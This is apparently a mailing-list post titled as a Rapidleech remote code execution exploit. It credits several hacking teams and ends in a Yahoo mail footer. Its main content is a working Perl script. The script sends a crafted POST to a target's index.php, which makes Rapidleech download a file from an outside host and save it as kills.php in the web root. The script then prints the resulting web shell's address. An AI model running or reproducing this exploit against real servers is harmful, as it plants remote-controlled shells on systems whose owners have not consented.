Rapidleech remote code execution exploit.
47a91b634d79fb830254956b731b301636d7ebe298c0f61b6ed34b09600f5956
Author : CSD
Software : Rapidleech
Company : Rapidleech
Bug : Remote Code execute
Exploit :
#/usr/bin/perl
use IO::Socket;
$ha=$ARGV[0];
$pa=$ARGV[1];
$file="kills.php";
if (!$ARGV[1]) {
print"\n";
print "[+] Coded By Nightmare Red_Dragon or H3CT0R3 [+]\n";
print "[+] Bug Discovered By Dark L0rD [+]\n";
print "[+] Black Hats of Mafia Hacking Team [+]\n";
print "[+] KAYVANIRAN IT AND SECURITY TEAM [+] \n";
print "[+] RapidLeech [+] \n";
print "[+] Black 0ut Frenzy Team [+] \n";
print "[+] OnHackerline WhiteHatTeam [+] \n";
print "[+] Persian site: http://www.onhackerline.ir/ [+] \n";
print "[+] English site: http://www.onhackerline.com/ [+] \n";
print"\n";
print "ex : www.ex.com /path/\n";
exit;
}
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ha",PeerPort=>"80") || die "[-] Unable to retrieve: $!";
$sendurl = "FileName=".$file."&host=www.edseek.org&path=%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&referer=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt&uuid=&email=&partSize=&method=tc&proxy=&saveto=./&link=http%3A%2F%2Fwww.edseek.org%2Fdownloads%2Ffile_info%2Fdescriptions%2Fsys.txt";
$sendlen = length($sendurl);
print $sock "POST ".$pa."/index.php HTTP/1.1\n";
print $sock "Host: ".$ha."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "Creating Shell...Plz W8\n\n";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
print "shell: ".$ha.$pa.$file;
____________________________________________________________________________________
Yahoo! Music Unlimited
Access over 1 million songs.
http://music.yahoo.com/unlimited